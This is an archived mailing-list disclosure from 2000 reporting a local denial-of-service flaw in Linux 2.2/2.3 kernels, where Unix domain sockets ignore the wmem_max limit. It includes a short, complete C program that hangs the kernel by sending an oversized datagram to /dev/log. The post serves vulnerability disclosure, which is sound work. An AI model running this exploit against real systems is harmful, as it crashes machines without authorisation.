OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Local Denial-of-Service attack against Linux
From: Jay Fenlason (fenlasonCLEARWAY.COM)
Date: Thu Mar 23 2000 - 16:55:09 CST


This amusing little program will hang Linux 2.2.12 (default Red Hat 6.1),
2.2.14 (latest stable kernel) and 2.3.99-pre2 (latest development kernel)
on my 6x86 scratch machine and our various Pentium development machines.
Note that this does not require any special privileges.

The send system call immediately puts the kernel in a loop spewing
kmalloc: Size (131076) too large
forever (or until you hit the reset button).

Apparently unix domain sockets are ignoring the /proc/sys/net/core/wmem_max
parameter, despite the documentation to the contrary. The fix should be
simple, but I haven't had time to chase it down, and I'm not (usually) a
Linux kernel developer.

                        -- JF

--- BEGIN INCLUDED SOURCE FILE ---

#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

char buf[128 * 1024];

int main ( int argc, char **argv )
{
    struct sockaddr SyslogAddr;
    int LogFile;
    int bufsize = sizeof(buf)-5;
    int i;

    for ( i = 0; i < bufsize; i++ )
        buf[i] = ' '+(i%95);
    buf[i] = '\0';

    SyslogAddr.sa_family = AF_UNIX;
    strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) );
    LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
    sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
    return 0;
}
--- END INCLUDED SOURCE FILE ---